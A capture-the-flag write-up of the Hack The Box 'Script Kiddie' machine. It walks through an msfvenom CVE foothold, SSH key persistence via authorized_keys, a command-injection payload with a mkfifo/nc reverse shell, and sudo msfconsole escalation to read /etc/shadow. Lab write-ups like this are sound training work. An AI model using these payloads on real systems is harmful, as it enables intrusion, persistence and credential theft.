Jack Cyber-security graduate student interested in researching privacy and security issues.

Hack The Box - Script Kiddie [Easy Linux]

Hack The Box - Script Kiddie [Easy Linux]



This easy Linux machine starts off with a CVE in MSF Venom sent to the server to gain a foothold. From here we notice a file scanlosers.sh with insecure logic that we could abuse to gain control of a second user on the box. Finally, as the pwn user we have sudo privileges to run MSF, which easily drops into a root shell.


  • Starting off with an nmap scan against all ports
  • ssh is open and a web server on port 5000 –> weird!


Going to this web server we can see that a “script kiddie” set up some tools that he could use. After trying multiple times to exploit the nmap and searchsploit inputs, I concluded that they were most likely not vulnerable and moved onto the payloads generator.

Initial Thoughts: possible command injection, malicious file upload

Searching Online

Offensive Security’s Exploit Database Archive



echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOuEDdcHsyiGAVYcSVdqt5t4ZfMVKlVG+C/g5KTNLGXGdPBieTAG/xRF2t8yHF62Q9om6PDAS5mgDzw1vnZZfZjUXowZQz8OVUoq3ZfklCDmobLuvhgMQP2ikLO+D9E1bjeneViNZ2rx4QU2YwV9FWd44b5wHhRDtfPwbYKlOY8ioO+0t57j3sMJldoE2p8NN17/TG5WjwPy0RyTAXSoi6Rt+Gs9ncux0aVFfIDwDeyPJnjpXs11isxOi57kCDUm6I6KdvL8xD6iMVR5Y0D9FMVe4qcNw8tzCIpCDqHoaGJRTjxz8yfHdFzzys2IwIA24a2vsiJU2axtavAM6g0mKvxhs/C6+n+SqwxwFXUDQAbLNHUXjhZXwkmkb6YGgfVlE4xKu47bj3FTWmabo0OLtwicf2WBjwPBxkzeyvvMwGmurbXA9SNTYRAYgyIQtkNpnrkn/ILR4wDMkWIfCD10TgKUsWTS8pqPdwtfCg9tVd32h6ykS20ivMEGq4UD/kX8= kali@kali" >> /home/kid/.ssh/authorized_keys

  • Get a bash shell through ssh by adding my public ssh key to the authorized_keys file



Seeing which users are on the box


  • This script parses the 3rd line in a log and passes it to a shell command… hmmmmm


a a ; /bin/bash -c '[[ -e "/tmp/z" ]] && rm -f "/tmp/z";mkfifo /tmp/z;cat /tmp/z | /bin/sh -i 2>&1 | nc 4443 > /tmp/z' #

Note the # at the end of the command. This is important so any commands that follow will not execute or cause an error in our exploit.

cat .test > /home/kid/logs/hackers
bash /home/pwn/scanlosers.sh

Above is a small bash script that will copy the contents of .test into /home/kid/logs/hackers and then immediately call scanlosers.sh

Getting the pwn user to fire the script


  • if you put command injection into the searchsploit input on the web app it will add your ip to /home/kid/logs/hackers




  • if you send a reverse shell in the third column and comment out the rest of the command, you can get a callback


Root priv-esc from pwn to root


First thing I did is check if we have sudo capabilities as the user pwn… turns out we do and its for MSF console.



Since MSF console is just a shell (and we can run it as root) you can see that we have the full abilities of root.

Cat /etc/shadow



Overall I thought this was a fun beginner box. It wasn’t too difficult yet demonstrated good skills like pivoting, cve’s and understanding sudo privileges.